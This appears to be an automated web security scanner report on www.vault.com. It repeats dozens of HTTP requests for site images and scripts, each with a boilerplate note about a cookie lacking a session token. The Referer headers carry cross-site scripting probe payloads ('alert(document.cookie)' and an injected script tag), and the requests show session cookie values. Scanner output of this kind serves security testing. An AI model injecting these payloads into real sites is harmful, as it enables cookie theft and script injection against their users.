GET /images/sponsors/sponsor_10404.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_1815.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_25318.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_377.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_385.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_43868.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_569724.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_6100.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_6603.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_7285.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_819.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_906.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_9066.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_923.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/store/covers/759-small.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/store/covers/888-small.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/subheader_background2.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/subheader_bottom2.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/subheader_top3.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/vault_logo_new.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/Tools.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery-1.3.2.min.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.DOMWindow.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.autocomplete.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.carousel.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
/** * * * Carousel object * Carousel.left = initial LEFT css property of the sliding container. * Carousel.links = array of carousel carousel items * Carousel.numImages = number of items that ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.popupWindow.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.stylish-select.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.swapimage.min.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/main.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/membership.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/!ut/p/c5/dY09D4IwGIR_0r3lhTaMfiEgIKaDtgspiSEoUgdj4r8X4uLC3XjP3cFi8ujefedevR_dgAusbKSIK63SgPY6ZMpKwQnXh2DHCjlsN_h2Jtc4z_U__HjiLWWkq5JlVHAhfjktaEWoUv-4wsCoxdNcThthltRxpMKpFUDDbPC8t3RTH_oCnk3SHg!!/?mode=&redirecturl=%2fwps%2fmyportal%2fusa%2frankingsf6c40'%3balert(document.cookie)%2f%2fdba4d06d54c%2findividual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; _chartbeat2=1wcinl964s8aejot; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/swfobject.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
/** * SWFObject v1.5.1: Flash Player detection and embed - http://blog.deconcept.com/swfobject/ * * SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License: * http://www.open ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/time-tracker.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
// Copyright 2007 Google, Inc. // This sample code is under the Apache2 license, see // http://www.apache.org/licenses/LICENSE-2.0 for license details. /** * @fileoverview Wrapper for Time Tracki ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/vault_header.js HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
